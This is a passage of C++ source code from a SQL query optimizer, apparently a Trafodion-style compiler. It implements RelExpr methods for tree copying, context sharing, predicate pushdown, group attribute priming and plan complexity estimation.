result->getInliningInfo().merge(&getInliningInfo()); result->setAccessSet0(getAccessSet0()); result->setAccessSet0(getAccessSet0()); //++MV - result->setUniqueColumns(getUniqueColumns()); if (uniqueColumnsTree_ != NULL) result->uniqueColumnsTree_ = uniqueColumnsTree_->copyTree(outHeap)->castToItemExpr(); //--MV - // leave any physical properties or CascadesMemo-related data // off the returned result ??? (see RelExpr::save) result->setBlockStmt(isinBlockStmt()); result->setFirstNRows(getFirstNRows()); result->oltOptInfo() = oltOptInfo(); result->setHint(getHint()); result->setRowsetIterator(isRowsetIterator()); result->setTolerateNonFatalError(getTolerateNonFatalError()); result->setIsExtraHub(isExtraHub()); result->setMarkedForElimination(markedForElimination()); result->seenIUD_ = seenIUD_; // set the expression's potential result->potential_ = potential_; // copy cascades trace info result->parentTaskId_ = parentTaskId_; result->stride_ = stride_; result->birthId_ = birthId_; result->memoExprId_ = memoExprId_; result->sourceMemoExprId_ = sourceMemoExprId_; result->sourceGroupId_ = sourceGroupId_; result->costLimit_ = costLimit_; result->originalExpr_ = this; return result; } // this method is not virtual, since combining the copies of the // top node and its children should be independent of the actual node RelExpr * RelExpr::copyTree(CollHeap* outHeap) { RelExpr * result = copyTopNode(0,outHeap); Int32 arity = getArity(); for (Lng32 i = 0; i < arity; i++) result->child(i) = child(i)->copyTree(outHeap); return result; } // this method is also not virtual, It does same thing as copyTree // except that it copies the RETDesc and groupAttr pointers too // this is method is used to get a copy of the original tree before // inserting it to Cascades. 
// Like copyTree, but additionally duplicates the GroupAttributes and
// carries over the RETDesc pointer, so the copy reflects the tree as it
// looked before insertion into Cascades.
RelExpr * RelExpr::copyRelExprTree(CollHeap* outHeap)
{
  RelExpr * result = copyTopNode(0,outHeap);
  result->setGroupAttr(new (outHeap) GroupAttributes(*(getGroupAttr())));
  result->setRETDesc(getRETDesc());
  result->getGroupAttr()->setLogExprForSynthesis(result);
  Int32 arity = getArity();
  for (Lng32 i = 0; i < arity; i++)
    result->child(i) = child(i)->copyRelExprTree(outHeap);
  return result;
}

// Return the expression this node was copied from ('this' if it was
// never copied). With transitive == TRUE, walk the originalExpr_ chain
// back to the oldest ancestor.
const RelExpr * RelExpr::getOriginalExpr(NABoolean transitive) const
{
  if (originalExpr_ == NULL)
    return this;

  RelExpr *result = originalExpr_;
  while (result->originalExpr_ && transitive)
    result = result->originalExpr_;
  return result;
}

// Non-const variant of the method above.
RelExpr * RelExpr::getOriginalExpr(NABoolean transitive)
{
  if (originalExpr_ == NULL)
    return this;

  RelExpr *result = originalExpr_;
  while (result->originalExpr_ && transitive)
    result = result->originalExpr_;
  return result;
}

// Set the block-statement flag on this node and, recursively, on the
// entire subtree below it.
void RelExpr::setBlockStmtRecursively(NABoolean x)
{
  setBlockStmt(x);
  Int32 arity = getArity();
  for (Lng32 i = 0; i < arity; i++)
    child(i)->setBlockStmtRecursively(x);
}

// -----------------------------------------------------------------------
// create or share an optimization goal for a child group
// -----------------------------------------------------------------------
Context * RelExpr::shareContext(Lng32 childIndex,
                                const ReqdPhysicalProperty* const reqdPhys,
                                const InputPhysicalProperty* const inputPhys,
                                CostLimit* costLimit,
                                Context * parentContext,
                                const EstLogPropSharedPtr& inputLogProp,
                                RelExpr *explicitlyRequiredShape) const
{
  // no need to do the job if costLimit id already negative
  if ( costLimit AND
       CURRSTMT_OPTDEFAULTS->OPHpruneWhenCLExceeded() AND
       costLimit->getValue(reqdPhys) < 0 )
    return NULL;

  const ReqdPhysicalProperty* searchForRPP;

  // if the required physical properties are empty, don't use them
  if (reqdPhys != NULL AND reqdPhys->isEmpty())
    searchForRPP = NULL;
  else
    searchForRPP = reqdPhys;

  // handle force plan directives: if the parent node must match a
  // certain tree, make sure the child node gets the appropriate
  // requirement to match a child node of the mustMatch pattern
  RelExpr *childMustMatch = explicitlyRequiredShape;
  if (parentContext->getReqdPhysicalProperty() != NULL AND
      parentContext->getReqdPhysicalProperty()->getMustMatch() != NULL AND
      explicitlyRequiredShape == NULL)
  {
    const RelExpr *parentMustMatch =
      parentContext->getReqdPhysicalProperty()->getMustMatch();

    // Reuse the parent's pattern if this node is a map value ids
    // node and the required pattern isn't. This is because a map value
    // ids node, PACK node and UNPACK node is essentially a no-op and
    // does not need to be specified in CONTROL QUERY SHAPE.
    // Sorry for putting this DBI code into
    // places where particular operator types shouldn't be known.
    // It's the summer of 1997 and we have a deadline for FCS.
    // Its (almost) summer of 2003 and I am adding the same thingy
    // for FIRST_N operator.
    if (((getOperatorType() == REL_MAP_VALUEIDS) &&
         (parentMustMatch->getOperatorType() != REL_MAP_VALUEIDS)) ||
        ((getOperatorType() == REL_PACK) AND
         (parentMustMatch->getOperatorType() != REL_PACK)) ||
        ((getOperatorType() == REL_UNPACKROWS) AND
         (parentMustMatch->getOperatorType() != REL_UNPACKROWS)) ||
        ((getOperatorType() == REL_FIRST_N) AND
         (parentMustMatch->getOperatorType() != REL_FIRST_N)) ||
        (CURRSTMT_OPTDEFAULTS->ignoreExchangesInCQS() AND
         (getOperatorType() == REL_EXCHANGE) AND
         (parentMustMatch->getOperatorType() != REL_FORCE_EXCHANGE)) ||
        (CURRSTMT_OPTDEFAULTS->ignoreSortsInCQS() AND
         (getOperatorType() == REL_SORT) AND
         (parentMustMatch->getOperatorType() != REL_SORT)))
    {
      childMustMatch = (RelExpr *) parentMustMatch;
    }
    else
    {
      // If the "must match" pattern specifies something other than
      // a cut op for child "childIndex" then this is our new "must match".
      if (childIndex < parentMustMatch->getArity() AND
          NOT parentMustMatch->child(childIndex)->isCutOp())
        childMustMatch = parentMustMatch->child(childIndex);
    }
  }

  // NOTE: AND binds tighter than OR, so this reads
  // childMustMatch != NULL OR (searchForRPP AND getMustMatch() != NULL).
  if (childMustMatch != NULL OR
      searchForRPP AND searchForRPP->getMustMatch() != NULL)
  {
    // we have to change the "must match" attribute of searchForRPP
    // add the "mustMatch" requirement
    if (searchForRPP != NULL)
    {
      searchForRPP = new (CmpCommon::statementHeap())
        ReqdPhysicalProperty(*searchForRPP, childMustMatch);
    }
    else
      searchForRPP = new (CmpCommon::statementHeap())
        ReqdPhysicalProperty(childMustMatch);
  }

  // Delegate to the child's group so an existing context with the same
  // goal can be shared instead of creating a new one.
  return (*CURRSTMT_OPTGLOBALS->memo)[child(childIndex).getGroupId()]->
    shareContext(searchForRPP, inputPhys, costLimit,
                 parentContext, inputLogProp);
} // RelExpr::shareContext()

// Read a defaults-table entry as an unsigned long.
ULng32 RelExpr::getDefault(DefaultConstants id)
{
  return ActiveSchemaDB()->getDefaults().getAsULong(id);
}

// Collect locally attached expressions, with display labels, for
// tree-display purposes.
void RelExpr::addLocalExpr(LIST(ExprNode *) &xlist,
                           LIST(NAString) &llist) const
{
  if (selection_ != NULL OR
      NOT predicates_.isEmpty())
  {
    // prefer the bound predicate set over the raw parse tree
    if (predicates_.isEmpty())
      xlist.insert(selection_);
    else
      xlist.insert(predicates_.rebuildExprTree());
    llist.insert("selection_predicates");
  }

  if(NOT uniqueColumns_.isEmpty())
  {
    xlist.insert(uniqueColumns_.rebuildExprTree());
    llist.insert("uniqueColumns_");
  }
}

//QSTUFF
// we must pushdown the outputs of a genericupdate root to its
// descendants to ensure that only those required output values are
// tested against indexes when selecting an index for a stream scan
// followed by an embedded update. Since we may allow for unions and
// for inner updates we just follow the isEmbeddedUpdate() thread once
// we reach a generic update root.
void RelExpr::pushDownGenericUpdateRootOutputs(
  const ValueIdSet &outputs)
{
  // At a generic-update root, start from this node's own characteristic
  // outputs; elsewhere, keep propagating the set handed down to us.
  ValueIdSet rootOutputs =
    getGroupAttr()->isGenericUpdateRoot() ?
    getGroupAttr()->getCharacteristicOutputs() : outputs;

  for (Int32 i=0; i < getArity(); i++)
  {
    if (child(i)->castToRelExpr()->
        getGroupAttr()->isEmbeddedUpdateOrDelete()){
      child(i)->castToRelExpr()->
        pushDownGenericUpdateRootOutputs(rootOutputs);
    }
  }

  if (NOT rootOutputs.isEmpty()){
    getGroupAttr()->setGenericUpdateRootOutputs(rootOutputs);
  }
}
//QSTUFF

void RelExpr::needSortedNRows(NABoolean val)
{
  // The operators listed below can create OR propagate a GET_N
  // request. Other operators will turn a GET_N request into GET_ALL.
  // There are a few exceptions like right side of NJ for semi join etc.
  // but these are not relevant for FirstN sort.
  // This method should only be used in the generator since we are using
  // physical node types.
  OperatorTypeEnum operatorType = getOperatorType();
  if ((operatorType != REL_FIRST_N) &&
      (operatorType != REL_EXCHANGE) &&
      (operatorType != REL_MERGE_UNION) &&
      (operatorType != REL_PROBE_CACHE) &&
      (operatorType != REL_ROOT) &&
      (operatorType != REL_LEFT_NESTED_JOIN) &&
      (operatorType != REL_LEFT_TSJ) &&
      (operatorType != REL_MAP_VALUEIDS))
    return ;

  if ((operatorType == REL_LEFT_NESTED_JOIN) ||
      (operatorType == REL_LEFT_TSJ))
  {
    // left side of left tsj propagates a GET_N request if afterPred is empty.
    if (getSelectionPred().isEmpty())
      child(0)->castToRelExpr()->needSortedNRows(val);
    return ;
  }

  for (Int32 i=0; i < getArity(); i++)
  {
    if (child(i))
      child(i)->castToRelExpr()->needSortedNRows(val);
  }
}

// -----------------------------------------------------------------------
// computeValuesReqdForPredicates()
//
// There has been some problems with this function (as to how it should
// behave). The issue has been whether we should allow an operator to
// have the boolean value of a predicate as its output. That is to say,
// whether (SCAN T1), for example, could evaluate a predicate such as
// (T1.a > 3) and output a value of true or false to its parent.
//
// In most cases, this wouldn't be an issue since the predicate is used
// to filter out all the non-qualified rows. However, such is not the
// case when a CASE statement is involved. Part of the CASE statement,
// (e.g. the WHEN clause) can be evaluated at the SCAN, while the rest
// of the statement could reference some other tables and therefore must
// be evaluated at an ancestor node of the tree.
//
// A complete example is SELECT CASE WHEN T1.A > 3 THEN T2.A ELSE 0 END
// FROM T1 JOIN T2 ON T1.C = T2.C. In this case, if we allow a boolean
// value to be our output, the (T1.A > 3) could be evaluated at SCAN T1,
// and the CASE statement itself at the JOIN. The alternative would be
// for SCAN T1 to output T1.A and the CASE statement evaluated wholly at
// the JOIN.
//
// Now, how do all these relate to this function? The purpose of this
// function is to turn a predicate into values required to evaluate the
// predicate. Thus, the question is: should we allow the boolean value
// of (T1.A > 3) be the value required to evaluate the predicate (T1.A >
// 3). Or, should the values be T1.A and 3 instead? More generally,
// should we go for the leaf values of a non-VEG predicate (there is a
// separate story for VEG predicates, see later) or just the bool value
// of that predicate?
//
// This function has been implemented to gather the leaf values. However,
// there is no reason why we could
// not just require the boolean value. The logic of predicate pushdown
// mandates that if the child of the operator is unable to produce that
// boolean value, it will figure out what sub-expressions it could produce
// in its outputs in order for the boolean value to be evaluated at its
// parent.
//
// On the other hand, since this function has not been changed for quite
// a while, we are worried the change might trigger problematic spots in
// other places which rely on this function behaving the way it has been.
// Through extensive testing, we didn't seem to identify any problems and
// therefore, we decided to commit this fix.
//
// Now for VEGPred's. A VEGPred is considered "evaluable" at an operator
// if any *one* of its VEG members is "evaluable". For example, VEGPred(
// VEG{T1.a,T2.a}) in the query SELECT T2.B FROM (T1 JOIN T2 ON T1.A =
// T2.A) is "evaluable" at SCAN T1 and will be pushed down. Clearly, only
// evaluating the predicate there is not enough. We have to keep the
// VEGPred at the JOIN as well. The logic in Join::pushdownCoveredExpr()
// correctly handle that now. That is, it keeps the predicate even if
// it has been pushed down. However, doing so means that in the example
// given, SCAN T1 has to return T1.A as an output rather than just the
// boolean value of VEGPred(VEG{T1.A,T2.A}). That boolean value is sort
// of only local to SCAN T1. This function, therefore, declares that the
// value required to evaluate a VEGPred is not the boolean value of the
// VEGPred itself but the VEGRef of its VEG. In our example, the required
// value is VEGRef(VEG{T1.A,T2.A}). The semantics of this is that SCAN T1
// is asked to return as an output one of the VEG members available to
// it. The pre-code generator will thus change this VEGRef into T1.A.
//
// 8/14/1998
//
// -----------------------------------------------------------------------
void RelExpr::computeValuesReqdForPredicates(const ValueIdSet& setOfExpr,
                                             ValueIdSet& reqdValues,
                                             NABoolean addInstNull)
{
  for (ValueId exprId = setOfExpr.init();
       setOfExpr.next(exprId);
       setOfExpr.advance(exprId))
  {
    if (exprId.getItemExpr()->getOperatorType() == ITM_VEG_PREDICATE)
    {
      // A VEGPredicate: require the VEGRef of its VEG rather than the
      // boolean predicate value (see the header comment above).
      VEG * vegPtr = ((VEGPredicate *)(exprId.getItemExpr()))->getVEG();
      reqdValues += vegPtr->getVEGReference()->getValueId();

      // If the VEG for this VEGPredicate contains a member that is
      // another VEGReference, add it to reqdValues in order to ensure
      // that it gets retrieved.
      //
      for (ValueId x = vegPtr->getAllValues().init();
           vegPtr->getAllValues().next(x);
           vegPtr->getAllValues().advance(x))
      {
        OperatorTypeEnum optype = x.getItemExpr()->getOperatorType();
        if ( optype == ITM_VEG_REFERENCE )
          // **********************************************************
          // Note: this "if" used to have the following cases as well.
          // We feel that they might not be necessary any more.
          // || optype == ITM_INSTANTIATE_NULL ||
          // optype == ITM_UNPACKCOL )
          // **********************************************************
          reqdValues += x;
        else if ( addInstNull && optype == ITM_INSTANTIATE_NULL )
        {
          // part of fix to soln 10-090618-2434: a full outer join
          // select ... from t1 inner join t2 on ...
          // full outer join t3 on ... where t2.RGN = 'EMEA'
          // whose selection predicate "t2.RGN = <constant>" must have
          // its null-instantiated "t.RGN" column added to reqdValues.
          reqdValues += x;
        }
      } // end inner for
    } // endif is a VEGPredicate
    else
    {
      // Not a VEGPred (either a "normal" pred or a "real" value). In
      // any case, just add the value to the required values set. (For
      // a "normal" pred, it means the boolean value for the predicate
      // is required.
      //
      reqdValues += exprId;
    }
  } // end outer for
} // computeValuesReqdForPredicates()

// Compute the values needed to produce the given output expressions;
// very long character outputs additionally contribute their leaf values.
void RelExpr::computeValuesReqdForOutput(const ValueIdSet& setOfExpr,
                                         const ValueIdSet& newExternalInputs,
                                         ValueIdSet& reqdValues)
{
  // if VEGPreds are in the output, get the underlying VEGRefs
  computeValuesReqdForPredicates(setOfExpr, reqdValues);

  const GroupAttributes emptyGA;
  for (ValueId exprId = setOfExpr.init();
       setOfExpr.next(exprId);
       setOfExpr.advance(exprId))
  {
    if ((exprId.getType().getTypeQualifier() == NA_CHARACTER_TYPE) &&
        (exprId.getType().getNominalSize() > CONST_32K))
    {
      exprId.getItemExpr()->getLeafValuesForCoverTest(reqdValues,
                                                      emptyGA,
                                                      newExternalInputs);
    }
  }
}

// -----------------------------------------------------------------------
// RelExpr::pushdownCoveredExpr()
// -----------------------------------------------------------------------
void RelExpr::pushdownCoveredExpr(const ValueIdSet & outputExpr,
                                  const ValueIdSet & newExternalInputs,
                                  ValueIdSet & predicatesOnParent,
                                  const ValueIdSet * setOfValuesReqdByParent,
                                  Lng32 childIndex
                                  )
{
  ValueIdSet exprToEvalOnParent, outputSet, extraHubNonEssOutputs;
  Int32 firstChild, lastChild; // loop bounds
  Int32 iter; // loop index variable
  NABoolean optimizeOutputs;

  if (getArity() == 0 )
    return; // we don't do anything for leaf nodes..

  // TSJs and generic updates keep all of their outputs
  if ((getOperator().match(REL_ANY_TSJ) ) ||
      (getOperator().match(REL_ANY_GEN_UPDATE) ) )
    optimizeOutputs = FALSE;
  else
    optimizeOutputs = TRUE;

  if (getOperator().match(REL_ANY_JOIN) && isExtraHub())
    extraHubNonEssOutputs =
      ((Join *)this)->getExtraHubNonEssentialOutputs();

  // -----------------------------------------------------------------
  // Should the pushdown be attempted on a specific child?
  // -----------------------------------------------------------------
  if ( (childIndex >= 0) AND (childIndex < getArity()) )
  { // yes, a child index is given
    firstChild = (Int32)childIndex;
    lastChild = firstChild + 1;
  }
  else // no, perform pushdown on all
  {
    firstChild = 0;
    lastChild = getArity();
  }

  // ---------------------------------------------------------------------
  // Examine the set of values required by the parent. Replace each
  // VEGPredicate with a VEGReferences for its VEG; if its VEG
  // contains other VEGReferences, add them to exprToEvalOnParent.
  // ---------------------------------------------------------------------
  if (setOfValuesReqdByParent)
    computeValuesReqdForPredicates(*setOfValuesReqdByParent,
                                   exprToEvalOnParent);
  computeValuesReqdForOutput(outputExpr,newExternalInputs,outputSet);

  // ---------------------------------------------------------------------
  // Are there any predicates that can be pushed down?
  // ---------------------------------------------------------------------
  if ( (getArity() > 0) AND (NOT predicatesOnParent.isEmpty()) )
  {
    // -----------------------------------------------------------------
    // 1) Figure out which predicates could be push to which child.
    //    Try to give all predicates to all children.
    // 2) Modify predOnParent to be those predicates that no could
    //    could take.
    // 3) Add to the selectionPred() of each child those predicates
    //    it could take (if it is not a cut operator)
    // 4) Add to exprToEvalOnParent the predicates that could not
    //    be push down to any child (predOnParent)
    // 5) Recompute the input and outputs for each child given this
    //    set of exprOnParent.
    // -----------------------------------------------------------------

    // -----------------------------------------------------------------
    // Allocate an array to contain the ValueIds of external inputs
    // that are referenced in the given expressions.
    // -----------------------------------------------------------------
    ValueIdSet referencedInputs[MAX_REL_ARITY];

    // -----------------------------------------------------------------
    // Allocate a ValueIdSet to contain the ValueIds of the roots of
    // sub-expressions that are covered by
    // a) the Group Attributes of a child and
    // b) the new external inputs.
    // Note that the containing expression is not covered for each
    // such sub-expression.
    // -----------------------------------------------------------------
    ValueIdSet coveredSubExprNotUsed;

    // -----------------------------------------------------------------
    // Allocate an array to contain the ValueIds of predicates that
    // can be pushed down to a specific child.
    // -----------------------------------------------------------------
    ValueIdSet predPushSet[MAX_REL_ARITY];

    // -----------------------------------------------------------------
    // Check which predicate factors are fully covered by a certain
    // child. Gather their ValueIds in predPushSet.
    // -----------------------------------------------------------------
    const ValueIdSet emptySet;

    // -----------------------------------------------------------------
    // Join predicates can be pushed below a GU root as the comment a
    // few lines below does applies only to selection predicates
    // and not join predicates. The comment below indicates that in
    // some cases we do not wish to push a user provided predicate on
    // select below the GU root. These user provided predicates are
    // stored as selection predicates.
    // For MTS deletes, an anti-semi-join is used to glue the
    // inlined tree. For such joins all predicates that are pulled
    // are stored as join predicates. The change below facilitates
    // a push down of those predicates. The firstChild condition below
    // ensures that we are considering join predicates here (see
    // Join::pushDownCoveredExpr)
    // -----------------------------------------------------------------
    NABoolean pushPredicateBelowGURoot = FALSE;

    if ((getGroupAttr()->isGenericUpdateRoot() AND
         getOperator() == REL_ANTI_SEMITSJ AND
         firstChild == 1 ) OR
        (NOT (getGroupAttr()->isGenericUpdateRoot())))
    {
      pushPredicateBelowGURoot = TRUE;
    }

    for (iter = firstChild; iter < lastChild; iter++)
    {
      if (NOT child(iter).getPtr()->isCutOp()){
        // QSTUFF
        // we don't push predicates beyond the root of a generic
        // update tree. This is done by pretending that those
        // predicates are not covered by any child. This is
        // required to allows us to distinguish between the
        // following two types of expressions:
        // select * from (delete from x) y where y.x > 3;
        // select * from (delete from x where x.x > 3) y;
        if (pushPredicateBelowGURoot ) {
        // QSTUFF
          child(iter).getGroupAttr()->coverTest(predicatesOnParent,
                                                newExternalInputs,
                                                predPushSet[iter],
                                                referencedInputs[iter],
                                                &coveredSubExprNotUsed);
        // QSTUFF
        }
        // QSTUFF
      }
      else
        // ----------------------------------------------------------
        // If this is a cutop these predicates were already pushed
        // down to the child during predicate pushdown. Compute
        // which predicates were pushable so that we can remove them
        // from predOnParent and avoid creating a new group that will
        // later be merged
        // ----------------------------------------------------------
        // QSTUFF
        // for more explanation please see comment above
        if ( pushPredicateBelowGURoot ) {
        // QSTUFF
          child(iter).getGroupAttr()->coverTest(predicatesOnParent,
                                                emptySet,
                                                predPushSet[iter],
                                                referencedInputs[iter],
                                                &coveredSubExprNotUsed);
        // QSTUFF
        }
        // QSTUFF
    } // for loop to perform coverTest()

    // -----------------------------------------------------------------
    // From the original set of predicates, delete all those predicates
    // that will be pushed down. The remaining predicates will be
    // evaluated on the parent (this node).
    // -----------------------------------------------------------------
    for (iter = firstChild; iter < lastChild; iter++)
      predicatesOnParent -= predPushSet[iter];

    // -----------------------------------------------------------------
    // Add the predicates that could not be pushed to any child to the
    // set of expressions to evaluate on the parent.
    // -----------------------------------------------------------------
    computeValuesReqdForPredicates(predicatesOnParent,
                                   exprToEvalOnParent);

    // -----------------------------------------------------------------
    // Perform predicate pushdown
    // -----------------------------------------------------------------
    for (iter = firstChild; iter < lastChild; iter++)
    {
      if (NOT child(iter).getPtr()->isCutOp())
      {
        // ---------------------------------------------------------
        // Reassign predicate factors to the appropriate children
        // ---------------------------------------------------------
        child(iter).getPtr()->selectionPred().insert(predPushSet[iter]);

        // ---------------------------------------------------------
        // Add the input values that are referenced by the predicates
        // that were pushed down in the above step, to the Group
        // Attributes of the child.
        // We need to call coverTest again to figure out which inputs
        // are needed for the predicates that will be pushdown.
        // ---------------------------------------------------------
        ValueIdSet inputsNeededByPredicates;
        child(iter).getGroupAttr()->coverTest(predPushSet[iter],
                                              referencedInputs[iter],
                                              predPushSet[iter],
                                              inputsNeededByPredicates,
                                              &coveredSubExprNotUsed);
        child(iter).getPtr()->getGroupAttr()->addCharacteristicInputs
          (inputsNeededByPredicates);

        ValueIdSet essChildOutputs;
        child(iter).getPtr()->getEssentialOutputsFromChildren
          (essChildOutputs);

        // ----------------------------------------------------------
        // Have the child compute what output it can provide for
        // the expressions that remain on the parent
        // ----------------------------------------------------------
        // TBD: Fix the hack described in
        // GroupAttributes::resolveCharacteristicOutputs()
        if(iter==1 AND getOperator().match(REL_ANY_LEFT_JOIN))
          child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO
            (newExternalInputs,
             exprToEvalOnParent,
             outputSet,
             essChildOutputs,
             &(getSelectionPred()),
             TRUE,
             optimizeOutputs,
             &extraHubNonEssOutputs
             );
        else
          child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO
            (newExternalInputs,
             exprToEvalOnParent,
             outputSet,
             essChildOutputs,
             NULL,
             FALSE,
             optimizeOutputs,
             &extraHubNonEssOutputs
             );
      };
    } // for loop to pushdown predicates
  } // endif (NOT predicatesOnParent.isEmpty())
  else
  {
    // ---------------------------------------------------------------------
    // Compute the characteristic inputs and outputs of each child
    // ---------------------------------------------------------------------
    for (iter = firstChild; iter < lastChild; iter++)
    {
      // -----------------------------------------------------------------
      // Ignore CutOps because they exist simply to facilitate
      // pattern matching. Their Group Attributes are actually those
      // of the CascadesGroup. So, don't mess with them!
      // -----------------------------------------------------------------
      if (NOT child(iter).getPtr()->isCutOp())
      {
        ValueIdSet essChildOutputs;
        child(iter).getPtr()->getEssentialOutputsFromChildren
          (essChildOutputs);

        // TBD: Fix the hack described in
        // GroupAttributes::resolveCharacteristicOutputs()
        child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO
          (newExternalInputs,
           exprToEvalOnParent,
           outputSet,
           essChildOutputs,
           NULL,
           FALSE,
           optimizeOutputs,
           &extraHubNonEssOutputs
           );
      }
    } // for loop to compute characteristic inputs and outputs
  } // endelse predicatesOnParent is empty
} // RelExpr::pushdownCoveredExpr()

// -----------------------------------------------------------------------
// A virtual method for computing output values that an operator can
// produce potentially.
// -----------------------------------------------------------------------
void RelExpr::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  Int32 nc = getArity();
  // For operators that are not leaves, clear the potential outputs
  // and rebuild them.
  if (nc > 0)
    for (Lng32 i = 0; i < nc; i++)
      outputValues += child(i).getGroupAttr()->getCharacteristicOutputs();
  else
    outputValues += getGroupAttr()->getCharacteristicOutputs();
} // RelExpr::getPotentialOutputValues()

// VEG-resolved variant; the base class simply forwards.
void RelExpr::getPotentialOutputValuesAsVEGs(ValueIdSet& outputs) const
{
  getPotentialOutputValues(outputs);
}

// -----------------------------------------------------------------------
// primeGroupAttributes()
// Initialize the Characteristic Inputs And Outputs of this operator.
// -----------------------------------------------------------------------
void RelExpr::primeGroupAttributes()
{
  // Ignore CutOps because they exist simply to facilitate
  // pattern matching. Their Group Attributes are actually those
  // of the CascadesGroup. So, don't mess with them.
if (isCutOp())
    return;

  // The method sets the characteristic outputs of a node to its
  // potential outputs and sets the required input to the values
  // it needs. It does this by calling two virtual functions
  // on RelExpr.
  ValueIdSet outputValues;
  getPotentialOutputValues(outputValues);
  getGroupAttr()->setCharacteristicOutputs(outputValues);
  recomputeOuterReferences();
} // RelExpr::primeGroupAttributes()

// -----------------------------------------------------------------------
// allocateAndPrimeGroupAttributes()
// This method is for allocating new Group Attributes for the children
// of this operator that were introduced in the dataflow by a rule-
// based transformation. Each new child, or set of children, intervene
// between this operator and another operator that was originally a
// direct child of the latter. The Group Attributes of each newly
// introduced child are recursively primed with the Characteristic
// Inputs and Outputs of the operators of which it is the parent.
// -----------------------------------------------------------------------
void RelExpr::allocateAndPrimeGroupAttributes()
{
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    CMPASSERT(child(i).getMode() == ExprGroupId::STANDALONE);
    // Terminate the recursive descent upon reaching a CutOp.
    // Ignore CutOps because they exist simply to facilitate
    // pattern matching. Their Group Attributes are actually
    // those for the CascadesGroup that they belong to and
    // must not change.
    if (NOT child(i)->isCutOp())
    {
      if (child(i).getGroupAttr() == NULL)
      {
        // A CutOp must have Group Attributes.
        child(i)->setGroupAttr(new (CmpCommon::statementHeap())
                                 GroupAttributes());
      }
      // Assign my Characteristic Inputs to my child.
      // This is done in order to ensure that they are propagated
      // recursively to all my children who are not CutOps.
      child(i).getPtr()->getGroupAttr()
               ->addCharacteristicInputs
                    (getGroupAttr()->getCharacteristicInputs());
      // Recompute the potential inputs/outputs for each real child
      // recursively.
      // Terminate the recursive descent upon encountering an
      // operator whose arity == 0
      child(i).getPtr()->allocateAndPrimeGroupAttributes();
      // Prime the Group Attributes of the child.
      // The following call primes the child's Characteristic Outputs.
      // It ensures that the inputs are minimal and outputs are maximal.
      child(i).getPtr()->primeGroupAttributes();
      // Now compute the GroupAnalysis fields
      child(i).getPtr()->primeGroupAnalysis();
    } // endif child is not a CutOp
  } // for loop
} // RelExpr::allocateAndPrimeGroupAttributes()

// Union the essential characteristic outputs of all children into
// essOutputs (output parameter, added to -- not cleared).
void RelExpr::getEssentialOutputsFromChildren(ValueIdSet & essOutputs)
{
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    essOutputs += child(i).getGroupAttr()->
                    getEssentialCharacteristicOutputs();
  }
}

// Promote to essential any of this node's non-essential outputs that
// some child already reports as essential.
void RelExpr::fixEssentialCharacteristicOutputs()
{
  ValueIdSet essChildOutputs,nonEssOutputs;
  getEssentialOutputsFromChildren(essChildOutputs);
  getGroupAttr()->getNonEssentialCharacteristicOutputs(nonEssOutputs);
  nonEssOutputs.intersectSet(essChildOutputs);
  getGroupAttr()->addEssentialCharacteristicOutputs(nonEssOutputs);
}

// do some analysis on the initial plan
// this is called at the end of the analysis phase
void RelExpr::analyzeInitialPlan()
{
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    child(i)->analyzeInitialPlan();
  }
}

// Returns the number of logical plans rooted at this expression
// (product over children of each child group's count).
// numOfMergedExprs is incremented for each self-referencing (merged)
// child group that had to be skipped; the caller compensates.
double RelExpr::calculateNoOfLogPlans(Lng32& numOfMergedExprs)
{
  double result = 1;
  Int32 nc = getArity();
  CascadesGroup* group;
  for (Lng32 i = 0; i < nc; i++)
  {
    if (getGroupId() == child(i).getGroupId())
    {
      // This is a recursive reference of an expression to itself
      // due to a group merge. We cannot call this method on the
      // child, as we would end up calling this method on ourselves
      // again!
So, we skip the recursive call on our child and
      // instead return an indication to our caller
      // (CascadesGroup::calculateNoOfLogPlans) that we encountered
      // a merged expression. Our caller will then know what to do
      // to calculate the correct number of logical expressions.
      numOfMergedExprs++;
    }
    else
    {
      group = (*CURRSTMT_OPTGLOBALS->memo)[child(i).getGroupId()];
      result *= group->calculateNoOfLogPlans();
    }
  } // for each child
  return result;
}

// This function is called before any optimization starts
// i.e. applied to the normalizer output (reorderJoinTree OK)
// Walks down the left spine iteratively, recursing only into multi-join
// children and "large" right children; each run of permutable join legs
// ("permutation set") contributes freeLeaves * 2^(freeLeaves-1).
double RelExpr::calculateSubTreeComplexity
                 (NABoolean& enableJoinToTSJRuleOnPass1)
{
  double result = 0;
  Int32 freeLeaves = 1;  // # of subtree legs that can permutate
  RelExpr* expr = this;
  while (expr)
  {
    if (expr->getGroupAttr()->isEmbeddedUpdateOrDelete() OR
        expr->getGroupAttr()->isStream())
    {
      enableJoinToTSJRuleOnPass1 = TRUE;
    }
    Int32 nc = expr->getArity();
    // The multi-join case
    if (expr->getOperatorType() == REL_MULTI_JOIN)
    {
      for (Int32 i = 0; i < nc; i++)
      {
        CascadesGroup* groupi =
          (*CURRSTMT_OPTGLOBALS->memo)[expr->child(i).getGroupId()];
        RelExpr * expri = groupi->getFirstLogExpr();
        result += expri->
          calculateSubTreeComplexity(enableJoinToTSJRuleOnPass1);
      }
      freeLeaves = nc;
      // end the while loop
      expr = NULL;
    }
    // Not multi-join, and not leaf
    else if (nc > 0)
    {
      if (nc == 1)
      {
        // no permutation can take place across groupbys
        if (expr->getOperator().match(REL_ANY_GROUP))
        {
          if (freeLeaves > 1)
          {
            // compute the last permuatation set contribution
            // to the complexity and start a new one
            result += freeLeaves * pow(2,freeLeaves-1);
            freeLeaves = 1; // start again
          }
        }
      }
      if (nc == 2)
      {
        double child1Complexity;
        CascadesGroup* group1 =
          (*CURRSTMT_OPTGLOBALS->memo)[expr->child(1).getGroupId()];
        if (group1->getGroupAttr()->getNumBaseTables() > 1)
        {
          // Only one log expr exist in the group at this point
          RelExpr * expr1 = group1->getFirstLogExpr();
          child1Complexity =
            expr1->calculateSubTreeComplexity(enableJoinToTSJRuleOnPass1);
          // adding this comp_bool guard in case this fix causes regressions
          // and we need to disable this fix. Should be taken out in a subsequent
          // release. (say 2.2)
          if (CmpCommon::getDefault(COMP_BOOL_123) == DF_OFF)
          {
            // The factor 2 accounts for the fact that the join could be a
